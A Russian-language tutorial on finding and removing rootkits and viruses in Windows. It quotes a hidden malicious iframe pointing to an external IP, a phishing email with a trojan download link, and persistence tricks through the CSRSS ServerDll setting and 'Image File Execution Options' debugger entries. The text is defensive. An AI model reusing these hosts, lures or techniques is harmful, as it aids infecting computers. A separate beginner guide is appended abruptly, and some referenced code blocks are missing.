Как удалить вирус? Универсальный способ на все случаи жизни. Как лечить компьютер от вирусов? Как удалить вирус который

Что делать, если антивирус не справился со своей работой.

    Вы, наверно, неоднократно встречали информацию в СМИ о том, что появился новый страшный вирус, который может привести к новой страшной эпидемии и чуть ли не к концу Интернета. Или, что появилась новая технология вирусописания, основанная на использовании младших битов пикселей графических изображений, и тело вируса практически невозможно обнаружить. Или... много еще чего страшненького. Иногда вирусы наделяют чуть ли не разумом и самосознанием. Происходит это от того, что многие пользователи, запутавшись в сложной классификации и подробностях механизма функционирования вирусов, забывают, что в первую очередь, любой вирус - это компьютерная программа, т.е. набор процессорных команд (инструкций), оформленных определенным образом. Неважно, в каком виде существует этот набор (исполняемый файл, скрипт, часть загрузочного сектора или группы секторов вне файловой системы) - гораздо важнее, чтобы эта программа не смогла получить управление, т.е. начать выполняться. Записанный на ваш жесткий диск, но не запустившийся вирус, также безобиден, как и любой другой файл. Главная задача в борьбе с вирусами - не обнаружить тело вируса, а предотвратить возможность его запуска. Поэтому грамотные производители вирусов постоянно совершенствуют не только технологии занесения вредоносного программного обеспечения в систему, но и способы скрытного запуска и функционирования.

Как происходит заражение компьютера вредоносным программным обеспечением (вирусом)? Ответ очевиден - должна быть запущена какая-то программа. Идеально - с административными правами, желательно - без ведома пользователя и незаметно для него. Способы запуска постоянно совершенствуются и основаны, не только на прямом обмане, но и на особенностях или недостатках операционной системы или прикладного программного обеспечения. Например, использование возможности автозапуска для сменных носителей в среде операционных систем семейства Windows привело к распространению вирусов на флэш-дисках. Функции автозапуска обычно вызываются со сменного носителя или из общих сетевых папок. При автозапуске обрабатывается файл Autorun.inf . Этот файл определяет, какие команды выполняет система. Многие компании используют эту функцию для запуска инсталляторов своих программных продуктов, однако, ее же, стали использовать и производители вирусов. В результате, об автозапуске, как некотором удобстве при работе за компьютером, можно забыть. - большинство грамотных пользователей данную опцию отключили навсегда.

Для отключения функций автозапуска в Windows XP/2000 reg-файл для импорта в реестр.

Для Windows 7 и более поздних отключение автозапуска можно выполнить с использованием апплета "Автозапуск" панели управления. В этом случае отключение действует по отношению к текущему пользователю. Более надежным способом защиты от внедрения вирусов, переносимых на съемных устройствах, является блокировка автозапуска для всех пользователей с помощью групповых политик:

  • запустить редактор групповых политик gpedit.msc
  • перейти в "Конфигурация компьютера" - - "Конфигурация Windows" - "Административные шаблоны" - "Компоненты Windows" - "Политика автозапуска".
  • установить значение "Вкл." для компонента "Отключить автозапуск"

  •     Но основным "поставщиком" вирусов, несомненно, является Интернет и, как основное прикладное программное обеспечение - "Обозреватель Интернета" (браузер). Сайты становятся все сложнее и красивее, появляются новые мультимедийные возможности, растут социальные сети, постоянно увеличивается количество серверов и растет число их посетителей. Обозреватель Интернета постепенно превращается в сложный программный комплекс - интерпретатор данных, полученных извне. Другими словами, - в программный комплекс, выполняющий программы на основании неизвестного содержимого. Разработчики обозревателей (браузеров) постоянно работают над повышением безопасности своих продуктов, однако производители вирусов тоже не стоят на месте, и вероятность заражения системы вредоносным ПО остается довольно высокой. Существует мнение, что если не посещать "сайты для взрослых", сайты с серийными номерами программных продуктов и т.п. то можно избежать заражения. Это не совсем так. В Интернете немало взломанных сайтов, владельцы которых даже не подозревают о взломе. И давно прошли те времена, когда взломщики тешили свое самолюбие подменой страниц (дефейсом). Сейчас подобный взлом обычно сопровождается внедрением в страницы вполне добропорядочного сайта, специального кода для заражения компьютера посетителя. Кроме того, производители вирусов используют наиболее популярные поисковые запросы для отображения зараженных страниц в результатах выдачи поисковых систем. Особенно популярны запросы с фразами "скачать бесплатно" и " скачать без регистрации и SMS". Старайтесь не использовать эти слова в поисковых запросах, иначе, риск получения ссылки на вредоносные сайты значительно возрастает. Особенно, если вы ищете популярный фильм, еще не вышедший в прокат или последний концерт известнейшей группы.

        Механизм заражения компьютера посетителя сайта, в упрощенном виде, я попробую объяснить на примере. Не так давно, при посещении одного, довольно популярного сайта, я получил уведомление программы мониторинга автозапуска (PT Startup Monitor) о том, что приложение rsvc.exe пытается выполнить запись в реестр. Приложение было благополучно прибито FAR"ом, а изменения в реестре отменены PT Startup Monitor"ом. Анализ страниц сайта показал наличие странного кода на языке Javascript, выполняющего операции по преобразованию строковых данных, не являющихся осмысленным текстом. Язык Javascript поддерживается большинством современных браузеров и используется практически на всех веб-страницах. Сценарий, загружаемый с таких страниц, выполняется обозревателем Интернета. В результате многочисленных преобразований упомянутых выше строк получался довольно простой код:

    iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"

    Означающий выполнение CGI-сценария сервера с IP - адресом 91.142.64.91 (не имеющего никакого отношения к посещаемому сайту) в отдельном окне (тег iframe) размером 1 пиксель по ширине и 1 пиксель по высоте, в невидимом окне. Результат - вполне вероятное вирусное заражение. Особенно, если нет антивируса или он не среагирует на угрозу. Данный пример скрытого перенаправления посетителя на вредоносный сайт с использованием тега "iframe" сегодня, наверно, не очень актуален, но вполне демонстрирует как, посещая легальный сайт, можно незаметно для себя побывать и на другом, не очень легальном, даже не подозревая об этом. К сожалению, абсолютной гарантии от вирусного заражения нет и нужно быть готовым к тому, что с вирусом придется справляться собственными силами.

        В последнее время, одним из основных направлений развития вредоносных программ стало применение в них всевозможных способов защиты от обнаружения антивирусными средствами - так называемые руткит (rootkit) - технологии. Такие программы часто или не обнаруживаются антивирусами или не удаляются ими. В этой статье я попытаюсь описать более или менее универсальную методику обнаружения и удаления вредоносного программного обеспечения из зараженной системы.

        Удаление "качественного" вируса, становится все более нетривиальной задачей, поскольку такой вирус разработчики снабжают свойствами, максимально усложняющими ее решение. Нередко вирус может работать в режиме ядра (kernel mode) и имеет неограниченные возможности по перехвату и модификации системных функций. Другими словами - вирус имеет возможность скрыть от пользователя (и антивируса) свои файлы, ключи реестра, сетевые соединения, - все, что может быть признаком его наличия в зараженной системе. Он может обойти любой брандмауэр, системы обнаружения вторжения и анализаторы протоколов. И, кроме всего прочего, он может работать и в безопасном режиме загрузки Windows. Иными словами, современную вредоносную программу очень непросто обнаружить и обезвредить.

        Развитие антивирусов тоже не стоит на месте, - они постоянно совершенствуются, и в большинстве случаев, смогут обнаружить и обезвредить вредоносное ПО, но рано или поздно, найдется модификация вируса, которая какое-то время будет "не по зубам" любому антивирусу. Поэтому самостоятельное обнаружение и удаление вируса - это работа, которую рано или поздно придется выполнять любому пользователю компьютера.

    Здравствуйте.
    Нас заинтересовала ваша кандидатура, однако предлагаем вам заполнить
    наш фирменный бланк резюме и отправить его по адресу [email protected]
    Ответ не гарантируется, однако если Ваше резюме нас заинтересует, мы
    позвоним Вам в течение нескольких дней. Не забудьте
    указать телефон, а также позицию, на которую Вы претендуете. Желательно
    также указать пожелания по окладу.
    Наш фирменный бланк вы можете скачать по нижеуказанной ссылке.
    http://verano-konwektor.pl/resume.exe

        Анализ заголовков письма показал, что оно было отправлено с компьютера в Бразилии через сервер, находящийся в США. А фирменный бланк предлагается скачать с сервера в Польше. И это с русскоязычным-то содержанием.

        Ясное дело, что никакого фирменного бланка вы не увидите, и скорее всего, получите троянскую программу на свой компьютер.
        Скачиваю файл resume.exe. Размер - 159744 байта. Пока не запускаю.
        Копирую файл на другие компьютеры, где установлены различные антивирусы - просто для очередной проверки их эффективности. Результаты не ахти - антивирус Avast 4.8 Home Edition деликатно промолчал. Подсунул его Symantec"у - та же реакция. Сработал только AVG 7.5 Free Edition. Похоже, этот антивирус, в самом деле, не зря набирает популярность.
        Все эксперименты выполняю на виртуальной машине с операционной системой Windows XP. Учетная запись с правами администратора, поскольку, чаще всего вирусы успешно внедряются в систему только, если пользователь является локальным администратором.
        Запускаю. Через какое-то время зараженный файл исчез, похоже, вирус начал свое черное дело.
        Поведение системы внешне не изменилось. Очевидно, нужна перезагрузка. На всякий случай, запрещаю в брандмауэре соединения по протоколу TCP. Оставляю разрешенными только исходящие соединения по UDP:53 (DNS) - надо же оставить вирусу хоть какую-то возможность проявить свою активность. Как правило, после внедрения, вирус должен связаться с хозяином или с заданным сервером в интернете, признаком чего будут DNS-запросы. Хотя, опять же, в свете сказанного выше, умный вирус может их замаскировать, кроме того, он может и обойти брандмауэр. Забегая вперед, скажу, что в данном конкретном случае этого не произошло, но для надежного анализа сетевой активности весь трафик зараженной машины лучше пустить через другую, незараженную, где можно быть уверенным, что правила брандмауэра выполняются, а анализатор трафика (я пользовался Wireshark"ом) выдает то, что есть на самом деле.
        Перезагружаюсь. Внешне ничего не изменилось, кроме того, что невозможно выйти в интернет, поскольку я сам отключил такую возможность. Ни в путях автозапуска, ни в службах, ни в системных каталогах не появилось ничего нового. Просмотр системного журнала дает только одну наводку - системе не удалось запустить таинственную службу grande48 . Такой службы у меня быть не могло, да и по времени это событие совпало с моментом внедрения. Что еще наводит на мысль об успешном внедрении - так это отсутствие в реестре записи о службе grande48 и отсутствие второго сообщения в журнале системы об ошибке запуска службы после перезагрузки. Это, скорее всего, некоторая недоработка вирусописателей. Хотя и несущественная, ведь большинство пользователей журнал событий не просматривают, да и на момент возникновения подозрения на заражение эта запись в журнале уже может и отсутствовать.

    Определяем наличие вируса в системе.

    1.     Наверняка должен быть "левый" трафик. Определить можно с помощью анализаторов протокола. Я использовал Wireshark. Сразу после загрузки первым запускаю его. Все правильно, есть наличие группы DNS-запросов (как потом оказалось - один раз за 5 минут) на определение IP-адресов узлов ysiqiyp.com, irgfqfyu.com, updpqpqr.com и т.п. Вообще-то все ОС Windows любят выходить в сеть, когда надо и не надо, антивирусы могут обновлять свои базы, поэтому определить принадлежность трафика именно вирусу довольно затруднительно. Обычно требуется пропустить трафик через незараженную машину и серьезно проанализировать его содержимое. Но это отдельная тема. В принципе, косвенным признаком ненормальности сетевой активности системы могут быть значительные значения счетчиков трафика провайдера, в условиях простоя системы, счетчики из свойств VPN-соединения и т.п.

    2.     Попробуем использовать программы для поиска руткитов. Сейчас таких программ уже немало и их несложно найти в сети. Одна из наиболее популярных - Марка Руссиновича, которую можно скачать на странице раздела Windows Sysinternals сайта Microsoft. Инсталляция не требуется. Разархивируем и запускаем. Жмем "Scan". После непродолжительного сканирования видим результаты:

        Кстати, даже не вникая в содержания строк, можно сразу заметить, что имеются очень "свежие" по времени создания/модификации записи или файлы (колонка "Timestamp") . Нас в первую очередь должны заинтересовать файлы с описанием (колонка "Description" ) - "Hidden from Windows API" - скрыто от API-интерфейса Windows. Скрытие файлов, записей в реестре, приложений - это, естественно, ненормально. Два файла - grande48.sys и Yoy46.sys - это как раз то, что мы ищем. Это и есть прописавшийся под видом драйверов искомый руткит или его часть, обеспечивающая скрытность. Наличие в списке остальных было для меня сюрпризом. Проверка показала - это нормальные драйверы Windows XP. Кроме того, вирус скрывал их наличие только в папке \system32 , а их копии в \system32\dllcache остались видимыми.
        Напомню, что в Windows XP применяется специальный механизм защиты системных файлов, называемый Windows File Protection (WFP) . Задача WFP - автоматическое восстановление важных системных файлов при их удалении или замене устаревшими или неподписанными копиями. Все системные файлы Windows XP имеют цифровую подпись и перечислены в специальной базе данных, используемой WFP. Для хранения копий файлов используется папка \system32\dllcache и, отчасти, \Windows\driver cache . При удалении или замене одного из системных файлов, WFP автоматически копирует "правильную" его копию из папки \dllcache. Если указанный файл отсутствует в папке \dllcache , то Windows XP просит вставить в привод компакт-дисков установочный компакт-диск Windows XP. Попробуйте удалить vga.sys из \system32, и система тут же его восстановит, используя копию из dllcache. А ситуация, когда, при работающей системе восстановления файлов, файл драйвера есть в \dllcache и его не видно в \system32 - это тоже дополнительный признак наличия руткита в системе.

    Удаляем вирус из системы.

        Осталось выполнить самое важное действие - удалить вирус. Самый простой и надежный способ - загрузиться в другой, незараженной операционной системе и запретить старт драйверов руткита.

    Воспользуемся стандартной консолью восстановления Windows. Берем установочный диск Windows XP и загружаемся с него. На первом экране выбираем 2-й пункт меню - жмем R.

    Выбираем систему (если их несколько):

    Вводим пароль администратора.
    Список драйверов и служб можно просмотреть с помощью команды listsvc:

    В самом деле, в списке присутствует Yoy46 , правда отсутствует grande48, что говорит о том, что файл драйвера grande48.sys скрытно присутствует в системе, но не загружается:

    Консоль восстановления позволяет запрещать или разрешать запуск драйверов и служб с помощью команд disable и enable . Запрещаем старт Yoy46 командой:

        Водим команду EXIT и система уходит на перезагрузку.
    После перезагрузки драйвер руткита не будет загружен, что позволит легко удалить его файлы и очистить реестр от его записей. Можно проделать это вручную, а можно использовать какой-нибудь антивирус. Наиболее эффективным, с моей точки зрения, будет бесплатный сканер на основе всем известного антивируса Dr.Web Игоря Данилова. Скачать можно отсюда - http://freedrweb.ru
        Там же можно скачать "Dr.Web LiveCD" - образ диска, который позволяет восстановить работоспособность системы, пораженной действиями вирусов, на рабочих станциях и серверах под управлением Windows\Unix, скопировать важную информацию на сменные носители либо другой компьютер, если действия вредоносных программ сделали невозможным загрузку компьютера. Dr.Web LiveCD поможет не только очистить компьютер от инфицированных и подозрительных файлов, но и попытается вылечить зараженные объекты. Для удаления вируса нужно скачать с сайта DrWeb образ (файл с расширением.iso) и записать его на CD. Будет создан загрузочный диск, загрузившись с которого, руководствуетесь простым и понятным меню.

        Если по каким-либо причинам, нет возможности воспользоваться Dr.Web LiveCD, можно попробовать антивирусный сканер Dr.Web CureIt!, который можно запустить, загрузившись в другой ОС, например, с использованием Winternals ERD Commander. Для сканирования зараженной системы необходимо указать именно ее жесткий диск (Режим "Выборочная проверка"). Сканер поможет вам найти файлы вируса, и вам останется лишь удалить связанные с ним записи из реестра.
        Поскольку вирусы научились прописываться на запуск в безопасном режиме загрузки, не мешает проверить ветку реестра:

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\SafeBoot
    Разделы:
    Minimal - список драйверов и служб запускаемых в безопасном режиме (Safe Mode)
    Network - то же, но с поддержкой сети.

    Добавлю, что существует новый класс rootkit, представителем которого является BackDoor.MaosBoot , появившийся в конце 2007г. Эта троянская программа прописывает себя в загрузочный сектор жесткого диска и обеспечивает скрытую установку своего драйвера в памяти. Сам Rootkit-драйвер напрямую записан в последние секторы физического диска, минуя файловую систему, чем и скрывает свое присутствие на диске. В общем-то, принцип не новый, лет десять назад вредоносные программы подобным образом маскировались на резервных дорожках дискет и жестких дисков, однако оказался очень эффективным, поскольку большинство антивирусов с задачей удаления BackDoor.MaosBoot до сих пор не справляются. Упоминаемый выше загрузочный сектор не проверяет, а секторы в конце диска для него никак не связаны с файловой системой и, естественно, такой руткит он не обнаружит. Правда, Dr.Web (а, следовательно, и Cureit) с BackDoor.MaosBoot вполне справляется.

        Если у вас возникли сомнения относительно какого-либо файла, то можно воспользоваться бесплатной онлайновой антивирусной службой virustotal.com . Через специальную форму на главной странице сайта закачиваете подозрительный файл и ждете результатов. Сервисом virustotal используются консольные версии множества антивирусов для проверки вашего подозреваемого файла. Результаты выводятся на экран. Если файл является вредоносным, то с большой долей вероятности, вы сможете это определить. В какой-то степени сервис можно использовать для выбора "лучшего антивируса".
    ссылка на одну из веток форума сайта virusinfo.info, где пользователи выкладывают ссылки на различные ресурсы посвященные антивирусной защите, в т.ч. и онлайн - проверок компьютера, браузера, файлов...

        Иногда, в результате некорректных действий вируса (или антивируса) система вообще перестает загружаться. Приведу характерный пример. Вредоносные программы пытаются внедриться в систему, используя различные, в том числе, довольно необычные способы. В процессе начальной загрузки, еще до регистрации пользователя, запускается "Диспетчер сеансов" (\SystemRoot\System32\smss.exe) , задача которого - запустить высокоуровневые подсистемы и сервисы (службы) операционной системы. На этом этапе запускаются процессы CSRSS (Client Server Runtime Process), WINLOGON (Windows Logon), LSASS (LSA shell), и оставшиеся службы с параметром Start=2 из раздела реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services

        Информация, предназначенная для диспетчера сеансов, находится в ключе реестра

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager

    Одним из способов внедрения в систему, является подмена dll-файла для CSRSS. Если вы посмотрите содержимое записи

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\Session Manager\SubSystems

    То найдете значения

    ServerDll=basesrv , ServerDll=winsrv . Библиотеки basesrv.dll и winsrv.dll - это "правильные" файлы системы, загружаемые службой CSRSS на обычной (незараженной) системе. Эту запись в реестре можно подправить на запись, обеспечивающую загрузку, например, вместо basesrv.dll, вредоносной basepvllk32.dll:

    ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)

    Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится "синим экраном смерти" (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.

    Поправить ситуацию можно так:

    Загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:\WINDOWS\system32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
    - загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.

        Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:

    "Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
    Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете "Диспетчер задач" - "Новая задача" - "Обзор" - находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
    HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
    и перезагружаетесь.

        В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье "Проблемы с загрузкой ОС" раздела "Windows"

        == Май 2008. ==

    Дополнение

        Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.

    После удаления вируса ни один антивирус не работает.

        Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный "Стрим Антивирус". Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы "Avira Antivir Guard". Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность - вирусов, руткитов и прочей гадости (Malware) в системе нет.
        В какой-то момент попробовал запустить антивирусную утилиту AVZ . Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
    Но: исполняемый файл avz.exe не запустился! Переименовываю avz.exe в musor.exe - все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:

    Опасно - отладчик процесса "avz.exe"="ntsd-d"
    Опасно - отладчик процесса "avguard.exe"="ntsd-d"
    :.

    Это была уже серьезная зацепка. Поиск в реестре по контексту "avz" привел к обнаружению в ветке

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

    Раздела с именем avz.exe , содержащем строковый параметр с именем "Debugger" и значением .
    И, как выяснилось позже, в указанной ветке присутствовал не только раздел "avz.exe", но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe - вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела???.exe.

        После удаления из реестра всех разделов, c именем???.exe и содержащих запись "Debugger" = "ntsd -d" работоспособность системы полностью восстановилась.

    В результате анализа ситуации с использованием параметра "ntsd -d" для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:

    Windows Registry Editor Version 5.00

    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    "Debugger"="ntsd -d"
    :.. и т.д.

    Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке \WINDOWS\, а вирус располагается где-то в другом месте - в корне диска, в папке \temp, \windows\system32\ Если вы создадите раздел с именем "Explorer.exe" - то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:\temp\winlogon.exe, а легальный модуль входа в систему C:\WINDOWS\SYSTEM32\winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).

        Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием - не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.

    Наиболее простой и эффективный путь - загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.

  • Использование Dr.Web LiveCD - самый простой и не требующий специальных знаний способ. Скачиваете iso-образ CD, записываете его на болванку, загружаетесь с CD-ROM и запускаете сканер.
  • Использование Winternals ERD Commander. Загружаетесь с него, подключившись к зараженной системе, и выполняете откат на контрольную точку восстановления с датой, когда заражения еще не было. Выбираете меню System Tools - System Restore . Если откат средствами ERD Commander"а выполнить невозможно, попробуйте вручную найти файлы реестра в данных контрольных точек и восстановить их в каталог Windows. Как это сделать я подробно описал в статье "Работа с реестром".
  • Загрузка в другой ОС и ручное удаление вируса. Самый сложный, но самый эффективный способ. В качестве другой ОС удобнее всего использовать тот же ERD Commander. Методика обнаружения и удаления вируса может быть следующей:

    Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги

    \Windows
    \Windows\system32
    \Windows\system32\drivers
    \Windows\Tasks\
    \RECYCLER
    \System Volume Information
    Каталоги пользователей \Documents And Settings\All Users и \Documents And Settings\имя пользователя

    Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft - SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)

    Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например - file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.

    Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) - дает положительный эффект. Даже если вирус не обнаруживается антивирусами.

    Если предыдущие методики не дали результата, остается одно - ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander"а имеются пункты:

    Autoruns - информация о параметрах запуска приложений и оболочке пользователя.
    Service and Driver Manager - информация о службах и драйверах системы.

  • - В качестве продолжения темы - как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista \ Windows 7. Использование безопасного режима с поддержкой командной строки.
  • Использование загрузочного диска Winternals ERD Commander - Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .
  • Сайт Олега Зайцева, автора AVZ. - Посвящен информационной безопасности, и в частности - применению одной из наиболее эффективных антивирусных утилит AVZ.
  • Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.
  • Начинающие пользователи компьютера довольно часто оказываются в затруднительном положении, ведь вопросы, которые у них появляются, другие, более продвинутые пользователи, считаю банальными. Именно по этой причине очень часто ответы на эти вопросы сложно найти в интернете или же на вопросы отвечает человек, уже забывший, что значит быть начинающим, а значит он использует терминологию и приемы, которые только еще сильнее запутывают новичка.

    Это касается и такой тривиальной задачи, как поиск и удаление вирусов.

    Я решил создать пошаговую инструкцию, в которой покажу, как бы я действовал, если бы столкнулся с вредоносной программой.

    Как определить, что компьютер заражен вирусом

    В начале имеет смысл рассказать о признаках, которые явно или косвенно указывают на вирусное заражение.

    Во-первых, это уведомление, которое выводит установленный на вашем компьютере антивирус. Это уведомление может выглядеть по разному и текст его может отличаться и зависит от конкретной антивирусной программы.

    Но не спешите сразу же впадать в панику. Всегда есть вероятность, что антивирус ошибся или перестраховался.

    Не устаю повторять, что антивирусная программа — это не панацея!

    Ни один в Мире антивирус не может быть на 100% эффективным, так как разработчики вирусов и вредоносных программ ВСЕГДА находятся на шаг впереди — сначала появляется вирус, а уже затем с ним начинают бороться.

    Многие начинающие пользователи имеют неверное представление о работе антивируса. Они считают, что антивирус в своей работе руководствуется только антивирусными базами, которые обновляются ежедневно. Это верно, но отчасти.

    Новые вирусы появляются сотнями и тысячами ежедневно и далеко не всегда им присваивается какое-то уникальное имя, под которым они заносятся в антивирусную базу. Такой привилегии удостаиваются только действительно уникальные вредоносные программы. Весь остальной «вирусный ширпотреб» создается, как правило, с помощью вспомогательных программ-конструкторов и антивирус может отловить подобные вирусы по определенным критериям (эвристический анализатор).

    Если программа или файл ведут себя по мнению антивируса подозрительно, то есть поведение подпадает под определенные, заложенные в антивирус критерии, то он их заблокирует и выдаст сообщение. Фактически же файл может быть вполне безобидным.

    Поэтому антивирус стоит воспринимать исключительно как сигнализацию, которая вполне может иметь (и часто так оно и есть) ложные срабатывания.

    Тем не менее, если антивирус «засомневался» и что-то заблокировал, то следует проверить компьютер полностью. При этом я бы рекомендовал делать это не только с помощью установленного на вашем компьютере антивируса, но и использовать альтернативное решение. То есть после полной проверки установленным антивирусом, сделать повторную проверку другой антивирусной программой, о чем я расскажу чуть позже.

    Также поводом для проверки компьютера на наличие вирусов может стать любая внештатная ситуация. Например, компьютер стал подтормаживать или внезапно перезагружаться, стали появляться ошибки при запуске программ или при работе операционной системы… В общем, любое ненормальное поведение компьютера стоит воспринимать как сигнал — стоит проверить компьютер антивирусом.

    Чем проверять компьютер на наличие вирусов

    Как я уже упомянул, с моей точки зрения, правильным будет проверить компьютер не только установленным на компьютере антивирусом, а еще и вторым, хорошо себя зарекомендовавшим антивирусным решением.

    При этом я НЕ имею в виду установку второго антивируса на компьютер! НЕТ! Этого делать нельзя!

    Я имею в виду, использование антивирусных сканеров, которые можно скачать и запустить без установки, а лучше даже с загрузочной флешки.

    Дело в том, что если ваш компьютер заражен, то вирус может спрятаться в системе и блокировать попытки установленного антивируса его обнаружить или удалить.

    При загрузке компьютера со специально созданной флешки, с нее будет запущена своя операционная система (обычно это Linux). Это означает, что все файлы вашего жесткого диска будут доступны, так как они не будут защищаться операционной системой Windows, которая установлена на жестком диске вашего компьютера.

    Таким образом мы сможем наиболее эффективно проверить все закоулки на вашем жестком диске и с бОльшей долей вероятности обнаружим угрозы.

    Подобные загрузочные флешки позволяют создать многие современные антивирусы. То есть можно зайти в меню установленного на вашем компьютере антивируса и с помощью него же создать загрузочную флешку. Но это при условии, что ваш антивирус имеет такую функцию. Об этом можно узнать в справочной системе вашей антивирусной программы.

    Я же предпочитаю использовать утилиту Dr.Web LiveDisk . Подобное решение есть и у Касперского, и у других ведущих разработчиков программ защиты, но мне привычнее работать именно с этой программой, поэтому я на ее примере покажу весь процесс.

    Создаем флешку с антивирусом

    Нам понадобится чистая флешка объемом 1Гб или более, ну или флешка со свободным пространством в 1Гб.
    Саму утилиту Dr.Web LiveDisk можно скачать с официального сайта .

    После того, как файл скачается, подключите флешку к компьютеру и запустите скачанный файл.

    Запустится программа, которая определит все доступные USB-устройства, подключенные к вашему компьютеру. Нужно будет из списка выбрать флешку.

    Утилита не удаляет файлы с флешки, но я обычно устанавливаю галочку, которая позволяет полностью отформатировать флешку и поместить на нее только файлы Dr.Web LiveDisk. Мне такой вариант больше нравится, так как для удаления Dr.Web LiveDisk в любом случае нужно форматировать флешку. Поэтому проще сразу временно перенести с нее нужные вам файлы, отформатировать флешку и создать Dr.Web LiveDisk. Когда загрузочный диск вам будет больше не нужен — снова отформатируете флешку и вернете на нее все файлы.

